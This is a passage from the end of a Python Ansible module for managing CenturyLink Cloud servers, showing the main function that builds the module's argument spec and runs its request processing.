The main function. Instantiates the module and calls process_request.
:return: none
"""
argument_dict = ClcServer._define_module_argument_spec()
module = AnsibleModule(supports_check_mode=True, **argument_dict)
clc_server = ClcServer(module)
clc_server.process_request()
if __name__ == '__main__':
main()